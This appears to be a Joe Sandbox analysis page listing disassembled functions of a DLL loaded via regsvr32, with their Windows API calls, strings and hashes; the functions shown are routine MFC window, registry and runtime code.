Uniqueness Score: -1.00%

Function 100270BC, Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 100270EF
PeekMessageA.USER32 ref: 10027113
UpdateWindow.USER32(?), ref: 1002712E
SendMessageA.USER32 ref: 1002714F
SendMessageA.USER32 ref: 10027167
UpdateWindow.USER32(?), ref: 100271AA
PeekMessageA.USER32 ref: 100271DB

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
Instruction ID: e439185c47b7e5e34c348b8e0b3dbe5bb3c4b57b45cec7e657144295835a6737
Opcode Fuzzy Hash: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
Instruction Fuzzy Hash: 9041C370E00246EBDB11CF69DC84E9FBBF8FF82B81F90815DE949A2150D7719A50DB10

Uniqueness

Uniqueness Score: -1.00%

Function 10027676, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10027705
SendMessageA.USER32 ref: 1002772E
GetWindowLongA.USER32 ref: 10027740
GetWindowLongA.USER32 ref: 10027751
SetWindowLongA.USER32 ref: 1002776D

Strings

,, xrefs: 10027724

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
Instruction ID: f848ae84a4977e1a31b52bc52376e27e10e8709ed1b3efe9ee7841c93cdd6a05
Opcode Fuzzy Hash: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
Instruction Fuzzy Hash: 1431C134600B119FC715DF78E888A6AB7F5FF48350B92056DE58997691DB70E800CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002245E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10022468
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1002254E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002256B
RegCloseKey.ADVAPI32(?), ref: 1002258B
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100225A6

Strings

Software\, xrefs: 100224CC

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
Instruction ID: 3764a028f082780bf1b34d3e1a3aecc110f1b9c57831791e493d608046546682
Opcode Fuzzy Hash: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
Instruction Fuzzy Hash: 3C41AC35800128EBCB22DBA0CC81AEEB3B8FF49310F5045D9F249E2191DB34AB958F94

Uniqueness

Uniqueness Score: -1.00%

Function 100222E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 100222EA
RegOpenKeyA.ADVAPI32(?,?,?), ref: 10022378
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002239B

Part of subcall function 1002228B: __EH_prolog3.LIBCMT ref: 10022292

Strings

Software\Classes\, xrefs: 1002232B

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: EnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 3518408925-1121929649
Opcode ID: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
Instruction ID: 704202dc6e21b2fa8b48efa6eea704b7fc6a1643c8ca87a9ade3220d51c06aab
Opcode Fuzzy Hash: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
Instruction Fuzzy Hash: A1317C36C00068EBDB22EBA4CD44BDDB6B8FB09350F5141D5F999A3252DA306FA49F91

Uniqueness

Uniqueness Score: -1.00%

Function 1002B26C, Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 1002B279
SendMessageA.USER32 ref: 1002B294
GetFocus.USER32 ref: 1002B2A9
SendMessageA.USER32 ref: 1002B2B7
GetLastActivePopup.USER32(?), ref: 1002B2E0
SendMessageA.USER32 ref: 1002B2ED

Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852

SendMessageA.USER32 ref: 1002B313

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
String ID:
API String ID: 3338174999-0
Opcode ID: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
Instruction ID: 3a08670cfc868389e080b955865bcb0f045f405a5b874c30a2897e43bb08e3ed
Opcode Fuzzy Hash: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
Instruction Fuzzy Hash: 7F1146B590065AFFEB11DFA1DD8AC9E7E7CEF41788B910075F504A2121EB719F04AB20

Uniqueness

Uniqueness Score: -1.00%

Function 1002AAF8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1002AB28
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB4B
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB67
RegCloseKey.ADVAPI32(?), ref: 1002AB77
RegCloseKey.ADVAPI32(?), ref: 1002AB81

Strings

software, xrefs: 1002AB10

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
Instruction ID: fb36ca9c2f952ecb3db15ddf6cda8d32fba402c4719dfc4725c3bd37d29a496b
Opcode Fuzzy Hash: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
Instruction Fuzzy Hash: 6B11E672900158FBDB11DB9ADD88CDFBFBDEB8A750B5000AAF504A2122D7319E44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002B00C, Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?), ref: 1002B013
__CxxThrowException@8.LIBCMT ref: 1002B01D

Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002B034
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041

Part of subcall function 10023B23: __CxxThrowException@8.LIBCMT ref: 10023B39

_memset.LIBCMT ref: 1002B060
TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
Instruction ID: 36d3102e2cb30bc4552268f57227952f3745dc8c02fd82b3b9104c669509b869
Opcode Fuzzy Hash: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
Instruction Fuzzy Hash: DC115E74100605AFD725EF64DCC5D2BBBB9FF453107A0C529F969D6522CB30AC24CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1002A948, Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 1002A956
GetSysColor.USER32(00000010), ref: 1002A95D
GetSysColor.USER32(00000014), ref: 1002A964
GetSysColor.USER32(00000012), ref: 1002A96B
GetSysColor.USER32(00000006), ref: 1002A972
GetSysColorBrush.USER32(0000000F), ref: 1002A97F
GetSysColorBrush.USER32(00000006), ref: 1002A986

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
Instruction ID: 2de359d209fd3f7b37bcce9053ec3ec9da3e309d31870537ed148616a4e248d0
Opcode Fuzzy Hash: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
Instruction Fuzzy Hash: 0BF0FE719407445BD730BF724E49B47BAD1FFC4710F02092EE2458B990D6B6E441DF44

Uniqueness

Uniqueness Score: -1.00%

Function 10023266, Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 1002326D
GlobalLock.KERNEL32 ref: 10023345
CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
DestroyWindow.USER32(00000000,?,1000150C,00000000,ABFFDF4B), ref: 100233EE
GlobalUnlock.KERNEL32(?,?,1000150C,00000000,ABFFDF4B), ref: 100233FE
GlobalFree.KERNEL32 ref: 10023407

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
String ID:
API String ID: 3003189058-0
Opcode ID: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
Instruction ID: 542586d5134ef99c8f61472b69a72313b72e87743f096b2e8f632b75dff3f323
Opcode Fuzzy Hash: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
Instruction Fuzzy Hash: DD519B31A0024AEFCB04DFA4E9859AEBBB5EF04350F95442DF506E7292CB70AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10021E9F, Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32 ref: 10021ED2
GetParent.USER32(00000000), ref: 10021EE0
GetParent.USER32(00000000), ref: 10021EF3
GetLastActivePopup.USER32(00000000), ref: 10021F04
IsWindowEnabled.USER32(00000000), ref: 10021F18
EnableWindow.USER32(00000000,00000000), ref: 10021F2B

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 472b318fd5bad27ffdf09f8c34eab2449045ee6e889f529d1c6834af2a2317c9
Instruction ID: f929a2de190b898985c8684475384bdcb1a7d6cc0d17529594567964d95cf4f5
Opcode Fuzzy Hash: 472b318fd5bad27ffdf09f8c34eab2449045ee6e889f529d1c6834af2a2317c9
Instruction Fuzzy Hash: 7711E73B5012725BDBA2DA65AD80BDF32D8EFB5AE1F830165EC24E7204D730CD0142D5

Uniqueness

Uniqueness Score: -1.00%

Function 10037738, Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 10037760

Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C

__getptd.LIBCMT ref: 1003776A

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 10037778
__getptd.LIBCMT ref: 10037786
__getptd.LIBCMT ref: 10037791
_CallCatchBlock2.LIBCMT ref: 100377B7

Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521

Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
Instruction ID: fb1f34f9027f5a0fd6fb665b034cbc12c1ee6665b85233a2d450c333db5c1a8f
Opcode Fuzzy Hash: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
Instruction Fuzzy Hash: 4F1104B9C04249EFDB01DFA4D945AEE7BB1FF08315F508469F814AB251DB38AA11DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1002A8D2, Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 1002A8E3
GetDlgCtrlID.USER32 ref: 1002A8F7
GetWindowLongA.USER32 ref: 1002A907
GetWindowRect.USER32 ref: 1002A919
PtInRect.USER32(?,?,?), ref: 1002A929
GetWindow.USER32(?,00000005), ref: 1002A936

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
Instruction ID: abcb09268cf445b2c35b0e2b56c0cfd5e9caec1888beec0722017402bcd9ce52
Opcode Fuzzy Hash: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
Instruction Fuzzy Hash: FC018F32500126BBEB219F559D48EAF3BACFF463A1F414165FD15D6060DB30DA829A98

Uniqueness

Uniqueness Score: -1.00%

Function 10029F40, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10029F70

Strings

AfxFrameOrView90s, xrefs: 1002A036
@, xrefs: 1002A07C
@, xrefs: 1002A115
AfxMDIFrame90s, xrefs: 1002A011

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90s$AfxMDIFrame90s
API String ID: 2102423945-455206835
Opcode ID: 7bcac898d79bec3422349b7028506952ff69134773f17cb7bb074026e0cf6295
Instruction ID: fa70bd333b2ddaae6f39455d5bc8e436e1dc58d3be4ecb045c2565641b92f197
Opcode Fuzzy Hash: 7bcac898d79bec3422349b7028506952ff69134773f17cb7bb074026e0cf6295
Instruction Fuzzy Hash: BD914175C00219ABDB80CFA4D581BDEBBF9EF48384F518065F908E7181EB749B84DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10020982, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1002099A
_memset.LIBCMT ref: 10020A12
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10020A75
LoadBitmapA.USER32 ref: 10020A8D

Strings

, xrefs: 100209F3

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
Instruction ID: 8ec26202c106691d72478eed222520a6e30d1cb825b7d1c94e22465ec1c68f9d
Opcode Fuzzy Hash: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
Instruction Fuzzy Hash: BD312772A003669FFB10CF289CC5B9D7BB5FB44340F9540AAF549EB182DA709E848B50

Uniqueness

Uniqueness Score: -1.00%

Function 10025110, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
GetSystemMetrics.USER32 ref: 10025168
GetSystemMetrics.USER32 ref: 1002516F

Strings

B, xrefs: 1002512F
DISPLAY, xrefs: 1002518C

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
Instruction ID: b60a64a5d5410e3ad8fe5a59109b18ab5d44eebb328e5d1eff8611f1e2dd37b9
Opcode Fuzzy Hash: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
Instruction Fuzzy Hash: 4511E771901334AFEB52DF64DC85B9B7BA8EF45791F414061FD0AAE006D672D910CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 10022E4B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

Edit, xrefs: 10022E9F

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: ae77f75da73c1987e0fa940b5ef14957e5d7f7bc95fc6b37df26c4b3c60db9f7
Instruction ID: d6f5fafa54f95e57ce7326ac47ec6df47115e019fe7e1f47642f1b857b3d0bbf
Opcode Fuzzy Hash: ae77f75da73c1987e0fa940b5ef14957e5d7f7bc95fc6b37df26c4b3c60db9f7
Instruction Fuzzy Hash: 4611A131200205BBEE20DAA1AC05F5EB6ECFF46791F930929F956D64B1CF61DC80E564

Uniqueness

Uniqueness Score: -1.00%

Function 10037474, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 1003748E

